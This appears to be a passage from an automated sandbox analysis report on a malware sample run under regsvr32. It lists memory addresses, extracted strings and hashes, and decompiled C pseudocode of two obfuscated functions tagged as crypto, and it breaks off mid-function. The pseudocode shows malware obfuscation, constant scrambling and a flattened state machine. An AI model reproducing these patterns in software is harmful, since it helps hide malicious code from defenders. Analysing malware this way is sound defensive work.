0x040e81d4
0x040e81e1
0x040e81e9
0x040e81f1
0x040e81fd
0x040e81fe
0x040e8202
0x040e820a
0x040e8212
0x040e821a
0x040e821f
0x040e8227
0x040e822f
0x040e8237
0x040e823c
0x040e8244
0x040e824c
0x040e8254
0x040e825c
0x040e8264
0x040e826c
0x040e8277
0x040e827f
0x040e828a
0x040e8292
0x040e829a
0x040e82a2
0x040e82aa
0x040e82b5
0x040e82c0
0x040e82cb
0x040e82d6
0x040e82e1
0x040e82ec
0x040e82f7
0x040e82ff
0x040e830a
0x040e8312
0x040e8317
0x040e831f
0x040e8327
0x040e832f
0x040e8337
0x040e833c
0x040e8344
0x040e8357
0x040e835e
0x040e8369
0x040e8371
0x040e8379
0x040e837e
0x040e8386
0x040e8393
0x040e8397
0x040e839f
0x040e83a4
0x040e83ac
0x040e83b8
0x040e83ba
0x040e83be
0x040e83c6
0x040e83ce
0x040e83d6
0x040e83e4
0x040e8546
0x040e854b
0x040e8554
0x040e8558
0x040e85a1
0x040e85c1
0x040e85d0
0x00000000
0x040e85f1
0x040e83ea
0x040e83ec
0x040e850a
0x040e850a
0x040e8510
0x00000000
0x00000000
0x00000000
0x00000000
0x040e85fe
0x040e85fe
0x040e85fe
0x040e8409
0x040e842e
0x040e8452
0x040e8457
0x040e8463
0x040e8467
0x040e84b6
0x040e84d6
0x040e84e2
0x040e84f1
0x040e84f6
0x040e84fb
0x040e8501
0x00000000
0x040e8501
0x00000000
0x040e84fb
0x040e8508
0x00000000

Strings

O"r, xrefs: 040E8067
jz, xrefs: 040E7FE6
$P, xrefs: 040E7D8E
\f%0, xrefs: 040E7DD1
}0, xrefs: 040E7FAF
Gqx, xrefs: 040E7E64
)p?M, xrefs: 040E8317
>}#, xrefs: 040E8369
o, xrefs: 040E7F00
^xZ, xrefs: 040E817C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: 5acfa24b1bd89469a6ae87300bf7dcc9a776f28041d9677508dd92a12d8f6b59
Instruction ID: d0ff48de1fd50c7688fd2fba86874e045986dfd10a18256256ac5b60d553de09
Opcode Fuzzy Hash: 5acfa24b1bd89469a6ae87300bf7dcc9a776f28041d9677508dd92a12d8f6b59
Instruction Fuzzy Hash: 471203B250D3819FD3A8CF21C949A9BFBE1BBC4708F10891DE1D996260DBB59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 040D238C, Relevance: 11.7, Strings: 9, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040D238C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t472;
				void* _t474;
				void* _t477;
				void* _t481;
				void* _t496;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed int _t507;
				signed int _t537;
				signed int _t548;
				void* _t550;
				void* _t555;

				_v1584 = _v1584 & 0x00000000;
				_v1788 = 0x33fdc0;
				_v1788 = _v1788 >> 6;
				_v1788 = _v1788 + 0xffff8381;
				_v1788 = _v1788 | 0x21bcf8d5;
				_v1788 = _v1788 ^ 0x23bcfbfd;
				_v1744 = 0xdaa9b2;
				_v1744 = _v1744 >> 0xa;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 * 0xc;
				_t496 = __ecx;
				_v1744 = _v1744 ^ 0x00028d02;
				_t550 = 0x854d193;
				_v1632 = 0x7e6112;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x07e103ba;
				_v1716 = 0xd48fca;
				_v1716 = _v1716 + 0x54b9;
				_v1716 = _v1716 >> 3;
				_v1716 = _v1716 ^ 0x00172ea2;
				_v1612 = 0xc953de;
				_v1612 = _v1612 + 0xffff7488;
				_v1612 = _v1612 ^ 0x00c8e870;
				_v1660 = 0xfcf42a;
				_v1660 = _v1660 ^ 0x4c4ed76c;
				_v1660 = _v1660 ^ 0x4cb955ce;
				_v1600 = 0xa6934b;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00032972;
				_v1604 = 0xac816b;
				_t498 = 0x70;
				_v1604 = _v1604 * 0x21;
				_v1604 = _v1604 ^ 0x16380272;
				_v1696 = 0x6f97e6;
				_v1696 = _v1696 | 0xa083c342;
				_v1696 = _v1696 ^ 0x07d73a4d;
				_v1696 = _v1696 ^ 0xa73f6dc5;
				_v1684 = 0xc2049d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 ^ 0x7749f8a8;
				_v1684 = _v1684 ^ 0x6f051565;
				_v1652 = 0xcc0992;
				_v1652 = _v1652 / _t498;
				_v1652 = _v1652 ^ 0x000062be;
				_v1644 = 0xb03f6e;
				_v1644 = _v1644 | 0x923ba096;
				_v1644 = _v1644 ^ 0x92bf0244;
				_v1596 = 0xe574f1;
				_t499 = 0x34;
				_v1596 = _v1596 * 0x7b;
				_v1596 = _v1596 ^ 0x6e3d68f9;
				_v1712 = 0x56ecc;
				_v1712 = _v1712 | 0x82f65ce8;
				_v1712 = _v1712 ^ 0x3fbbcfe7;
				_v1712 = _v1712 ^ 0xbd43ec0e;
				_v1672 = 0x17149a;
				_v1672 = _v1672 >> 3;
				_v1672 = _v1672 ^ 0x000903bb;
				_v1780 = 0xd02801;
				_v1780 = _v1780 + 0x92b0;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 ^ 0x000a2638;
				_v1680 = 0x58b587;
				_v1680 = _v1680 / _t499;
				_t500 = 0x6c;
				_v1680 = _v1680 / _t500;
				_v1680 = _v1680 ^ 0x000e92c3;
				_v1756 = 0xa3a224;
				_v1756 = _v1756 + 0xffffb0d0;
				_v1756 = _v1756 | 0x22aa770c;
				_v1756 = _v1756 ^ 0xa1e09b61;
				_v1756 = _v1756 ^ 0x83433f26;
				_v1772 = 0x502a69;
				_v1772 = _v1772 + 0xf56b;
				_v1772 = _v1772 ^ 0x45c826e2;
				_v1772 = _v1772 << 3;
				_v1772 = _v1772 ^ 0x2cc29674;
				_v1704 = 0x78c4c8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 >> 0xb;
				_v1704 = _v1704 ^ 0x000284d1;
				_v1636 = 0x5a1a48;
				_v1636 = _v1636 | 0x49fffb3e;
				_v1636 = _v1636 ^ 0x49fe8be8;
				_v1740 = 0xbf037f;
				_v1740 = _v1740 << 0xe;
				_t501 = 0x25;
				_v1740 = _v1740 / _t501;
				_v1740 = _v1740 | 0xccccb3e4;
				_v1740 = _v1740 ^ 0xcdfabced;
				_v1688 = 0x95b1ca;
				_v1688 = _v1688 ^ 0x177e4a6b;
				_v1688 = _v1688 | 0x2f1db7c3;
				_v1688 = _v1688 ^ 0x3ffaee54;
				_v1592 = 0x55c9d;
				_v1592 = _v1592 + 0x6a7d;
				_v1592 = _v1592 ^ 0x0009fe3c;
				_v1628 = 0x3a227c;
				_v1628 = _v1628 + 0x86b1;
				_v1628 = _v1628 ^ 0x003b89cb;
				_v1588 = 0x8f964;
				_v1588 = _v1588 ^ 0xa28705c5;
				_v1588 = _v1588 ^ 0xa2875abd;
				_v1748 = 0xfacc7e;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 << 5;
				_v1748 = _v1748 * 0x52;
				_v1748 = _v1748 ^ 0x141cbb89;
				_v1668 = 0x1ea707;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 ^ 0x0009aede;
				_v1620 = 0x6a93f9;
				_v1620 = _v1620 * 0x2f;
				_v1620 = _v1620 ^ 0x139d0c16;
				_v1732 = 0xe0254d;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 + 0x8d90;
				_v1732 = _v1732 ^ 0x6e303e8a;
				_v1732 = _v1732 ^ 0x6e36b510;
				_v1764 = 0x8f9e28;
				_v1764 = _v1764 | 0x05ab8c08;
				_v1764 = _v1764 ^ 0x1f734d6b;
				_v1764 = _v1764 | 0x4c44fbff;
				_v1764 = _v1764 ^ 0x5ed9dcbf;
				_v1664 = 0x89ae50;
				_v1664 = _v1664 + 0xffff7042;
				_v1664 = _v1664 ^ 0x008bcf93;
				_v1720 = 0x59414f;
				_v1720 = _v1720 ^ 0xb8de2fa2;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0xc43925a0;
				_v1776 = 0x701ae5;
				_v1776 = _v1776 * 0x2f;
				_v1776 = _v1776 + 0xffff7ac3;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 ^ 0x000eab5b;
				_v1784 = 0xc6ba99;
				_v1784 = _v1784 + 0xffff3dc8;
				_v1784 = _v1784 + 0xfffff02f;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0x17a755e4;
				_v1648 = 0x49cca0;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x7324fd9e;
				_v1656 = 0xf258c2;
				_v1656 = _v1656 >> 9;
				_v1656 = _v1656 ^ 0x0001b893;
				_v1792 = 0x2c7b35;
				_t265 =  &_v1792; // 0x2c7b35
				_t502 = 0x5b;
				_v1792 =  *_t265 * 0xd;
				_v1792 = _v1792 << 2;
				_v1792 = _v1792 + 0x1495;
				_v1792 = _v1792 ^ 0x090f1a77;
				_v1768 = 0xbf4508;
				_v1768 = _v1768 / _t502;
				_v1768 = _v1768 * 0x7b;
				_v1768 = _v1768 * 0x6c;
				_v1768 = _v1768 ^ 0x6d142a82;
				_v1640 = 0xd70bb;
				_v1640 = _v1640 + 0xffffb965;
				_v1640 = _v1640 ^ 0x000d3816;
				_v1752 = 0x745b9d;
				_v1752 = _v1752 >> 0xb;
				_v1752 = _v1752 + 0xde80;
				_v1752 = _v1752 + 0xffff3192;
				_v1752 = _v1752 ^ 0x0008925b;
				_v1760 = 0xacf8cd;
				_v1760 = _v1760 + 0xffff9672;
				_v1760 = _v1760 | 0xf153a794;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00f89a8f;
				_v1736 = 0x809c29;
				_v1736 = _v1736 + 0xffffec2c;
				_v1736 = _v1736 | 0xf5f6afdc;
				_v1736 = _v1736 ^ 0xe29e6862;
				_v1736 = _v1736 ^ 0x176fe90e;
				_v1692 = 0x187f09;
				_v1692 = _v1692 ^ 0xea03092e;
				_v1692 = _v1692 + 0x8629;
				_v1692 = _v1692 ^ 0xea1b0891;
				_v1616 = 0xdadf05;
				_v1616 = _v1616 >> 3;
				_v1616 = _v1616 ^ 0x001b90e7;
				_v1700 = 0x255f4a;
				_v1700 = _v1700 + 0x19d8;
				_v1700 = _v1700 * 0x77;
				_v1700 = _v1700 ^ 0x1164c06a;
				_v1728 = 0x19a192;
				_v1728 = _v1728 | 0x5ed50fa2;
				_v1728 = _v1728 + 0xffff411c;
				_v1728 = _v1728 | 0x02c614be;
				_v1728 = _v1728 ^ 0x5edf5bbc;
				_v1608 = 0x401b2;
				_v1608 = _v1608 | 0xbe85eb48;
				_v1608 = _v1608 ^ 0xbe8cf33f;
				_v1676 = 0x1ae3ab;
				_v1676 = _v1676 | 0xf7e0dbb3;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x0f7cac70;
				_v1724 = 0xfdfaa3;
				_v1724 = _v1724 + 0xbcd0;
				_v1724 = _v1724 | 0x4b62528b;
				_v1724 = _v1724 ^ 0x4bf9131d;
				_v1708 = 0x8383c7;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 + 0xffff26cd;
				_v1708 = _v1708 ^ 0x002bd4f5;
				_v1624 = 0xf208a5;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf20fbad4;
				_t548 = _v1584;
				while(1) {
					L1:
					_t503 = 0x5394512;
					L2:
					while(_t550 != 0x36274) {
						if(_t550 == 0x34d5b0c) {
							_push(_t503);
							_t477 = E040E85FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
							__eflags = _t477;
							if(_t477 == 0) {
								L26:
								return _t477;
							}
							E040F1538(_v1728, _v1608, _v1580);
							_t537 = _v1724;
							_push(_v1576);
							_t507 = _v1676;
							L25:
							return E040F1538(_t507, _t537);
						}
						if(_t550 == 0x37ad1c9) {
							_t537 = _v1624;
							_push(_v1584);
							_t507 = _v1708;
							goto L25;
						}
						if(_t550 == _t503) {
							_push(_v1792);
							_t481 = E040E017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
							_t555 = _t555 + 0x20;
							__eflags = _t481;
							if(__eflags != 0) {
								E040F1538(_v1768, _v1640, _v1580);
								E040F1538(_v1752, _v1760, _v1576);
							}
							L14:
							_t550 = 0x37ad1c9;
							while(1) {
								L1:
								_t503 = 0x5394512;
								goto L2;
							}
						}
						if(_t550 == 0x854d193) {
							_t550 = 0x36274;
							continue;
						}
						if(_t550 == 0x9c7608b) {
							E040F0DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
							 *((short*)(E040E09DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
							E040DBAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
							_push(_v1740);
							_push(_v1636);
							_push(_v1704);
							E040F2D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0x40d18bc,  &_v1564,  &_v1044, E040EE1F8(0x40d18bc, _v1772, __eflags));
							E040EFECB(_t488, _v1668, _v1620, _v1732, _v1764);
							_t555 = _t555 + 0x58;
							__eflags = E040DBFBE( &_v1564, _t496, _v1720);
							if(__eflags != 0) {
								_t474 = 0x2f41e48;
								__eflags = _t548 - 0x2f41e48;
								_t503 = 0x5394512;
								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
								continue;
							}
							goto L14;
						}
						if(_t550 != 0xf62a168) {
							L20:
							__eflags = _t550 - 0x4f1a594;
							if(__eflags != 0) {
								continue;
							}
							return _t474;
						}
						if(_t548 != _t474) {
							_t550 = 0x9c7608b;
							continue;
						}
						_push(_v1788);
						_push( &_v1584);
						_t477 = E040E9774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
						_t555 = _t555 + 0x18;
						if(_t477 == 0) {
							goto L26;
						}
						_t550 = 0x9c7608b;
						goto L1;
					}
					_t472 = E040EC387(_t503);
					__eflags = _t472 - E040EBC6B();
					_t474 = 0x2f41e48;
					_t550 = 0xf62a168;
					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
					_t503 = 0x5394512;
					goto L20;
				}
			}

0x040d2392
0x040d239c
0x040d23a4
0x040d23a9
0x040d23b1
0x040d23b9
0x040d23c1
0x040d23c9
0x040d23ce
0x040d23dc
0x040d23e0
0x040d23e2
0x040d23ea
0x040d23ef
0x040d23fa
0x040d2402
0x040d240d
0x040d2415
0x040d241d
0x040d2422
0x040d242a
0x040d2435
0x040d2440
0x040d244b
0x040d2456
0x040d2461
0x040d246c
0x040d2477
0x040d247f
0x040d248a
0x040d249f
0x040d24a2
0x040d24a9
0x040d24b4
0x040d24bc
0x040d24c4
0x040d24cc
0x040d24d4
0x040d24df
0x040d24e7
0x040d24f2
0x040d24fd
0x040d2513
0x040d251a
0x040d2525
0x040d2530
0x040d253b
0x040d2546
0x040d2559
0x040d255a
0x040d2561
0x040d256c
0x040d2574
0x040d257c
0x040d2584
0x040d258c
0x040d2597
0x040d259f
0x040d25aa
0x040d25b2
0x040d25ba
0x040d25bf
0x040d25c4
0x040d25cc
0x040d25e0
0x040d25f2
0x040d25f7
0x040d2600
0x040d260b
0x040d2613
0x040d261b
0x040d2623
0x040d262b
0x040d2633
0x040d263b
0x040d2643
0x040d264b
0x040d2650
0x040d2658
0x040d2660
0x040d2665
0x040d266a
0x040d2672
0x040d267d
0x040d2688
0x040d2693
0x040d269b
0x040d26a4
0x040d26a7
0x040d26ab
0x040d26b3
0x040d26bb
0x040d26c3
0x040d26cb
0x040d26d3
0x040d26db
0x040d26e6
0x040d26f1
0x040d26fc
0x040d2707
0x040d2712
0x040d271d
0x040d2728
0x040d2733
0x040d273e
0x040d2746
0x040d274b
0x040d2755
0x040d2759
0x040d2761
0x040d276c
0x040d2774
0x040d277f
0x040d2792
0x040d2799
0x040d27a4
0x040d27ac
0x040d27b1
0x040d27b9
0x040d27c1
0x040d27c9
0x040d27d1
0x040d27d9
0x040d27e1
0x040d27e9
0x040d27f1
0x040d27fc
0x040d2807
0x040d2812
0x040d281a
0x040d2822
0x040d2827
0x040d282f
0x040d283c
0x040d2840
0x040d2848
0x040d284d
0x040d2857
0x040d285f
0x040d2867
0x040d286f
0x040d2874
0x040d287c
0x040d2887
0x040d288f
0x040d289a
0x040d28a5
0x040d28ad
0x040d28b8
0x040d28c0
0x040d28c7
0x040d28c8
0x040d28cc
0x040d28d1
0x040d28d9
0x040d28e1
0x040d28ef
0x040d28f8
0x040d2901
0x040d2905
0x040d290d
0x040d2918
0x040d2923
0x040d292e
0x040d2936
0x040d293b
0x040d2943
0x040d294b
0x040d2953
0x040d295b
0x040d2963
0x040d296b
0x040d2970
0x040d2978
0x040d2980
0x040d2988
0x040d2990
0x040d2998
0x040d29a0
0x040d29a8
0x040d29b0
0x040d29b8
0x040d29c0
0x040d29cb
0x040d29d3
0x040d29de
0x040d29e6
0x040d29f3
0x040d29f7
0x040d29ff
0x040d2a07
0x040d2a0f
0x040d2a17
0x040d2a1f
0x040d2a27
0x040d2a32
0x040d2a3d
0x040d2a48
0x040d2a53
0x040d2a5e
0x040d2a66
0x040d2a71
0x040d2a79
0x040d2a81
0x040d2a89
0x040d2a91
0x040d2a99
0x040d2a9e
0x040d2aa6
0x040d2aae
0x040d2ab9
0x040d2ac6
0x040d2ad1
0x040d2ad8
0x040d2ad8
0x040d2add
0x00000000
0x040d2ae2
0x040d2af4
0x040d2d78
0x040d2da3
0x040d2dab
0x040d2dad
0x040d2de9
0x040d2de9
0x040d2de9
0x040d2dc1
0x040d2dc6
0x040d2dcb
0x040d2dd2
0x040d2dd9
0x00000000
0x040d2dde
0x040d2afc
0x040d2d64
0x040d2d6b
0x040d2d72
0x00000000
0x040d2d72
0x040d2b04
0x040d2cb3
0x040d2ce4
0x040d2ce9
0x040d2cec
0x040d2cee
0x040d2d02
0x040d2d17
0x040d2d1c
0x040d2c89
0x040d2c89
0x040d2ad8
0x040d2ad8
0x040d2add
0x00000000
0x040d2add
0x040d2ad8
0x040d2b10
0x040d2ca9
0x00000000
0x040d2ca9
0x040d2b1c
0x040d2b99
0x040d2bc1
0x040d2be2
0x040d2bef
0x040d2bf3
0x040d2bfa
0x040d2c46
0x040d2c63
0x040d2c68
0x040d2c85
0x040d2c87
0x040d2c90
0x040d2c9a
0x040d2c9c
0x040d2ca1
0x00000000
0x040d2ca1
0x00000000
0x040d2c87
0x040d2b24
0x040d2d56
0x040d2d56
0x040d2d5c
0x00000000
0x00000000
0x00000000
0x040d2d5c
0x040d2b2c
0x040d2b72
0x00000000
0x040d2b72
0x040d2b2e
0x040d2b39
0x040d2b58
0x040d2b5d
0x040d2b62
0x00000000
0x00000000
0x040d2b68
0x00000000
0x040d2b68
0x040d2d31
0x040d2d3d
0x040d2d44
0x040d2d49
0x040d2d4e
0x040d2d51
0x00000000
0x040d2d51

Strings

J_%, xrefs: 040D29DE
8&, xrefs: 040D25C4
i*P, xrefs: 040D2633
OAY, xrefs: 040D2812
$P, xrefs: 040D23DA
|":, xrefs: 040D26FC
M%, xrefs: 040D27A4
}j, xrefs: 040D26E6
5{,, xrefs: 040D28C0

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
API String ID: 0-2024644708
Opcode ID: aea3c68ff7010ab66325839533616087dd97dc9a266c47278af4a6ce3cdeb4fa
Instruction ID: 76f4c2c3f25c1e6186c1a983d95451e9c0aa60b4699df7c87ea31d775652eb11
Opcode Fuzzy Hash: aea3c68ff7010ab66325839533616087dd97dc9a266c47278af4a6ce3cdeb4fa
Instruction Fuzzy Hash: B83210715093819FD3B8CF61C54AB9BBBE1BBC4308F50891DE2DAA6260D7B19909CF13

Uniqueness

Uniqueness Score: -1.00%

Function 040EB257, Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E040EB257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E040EFE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
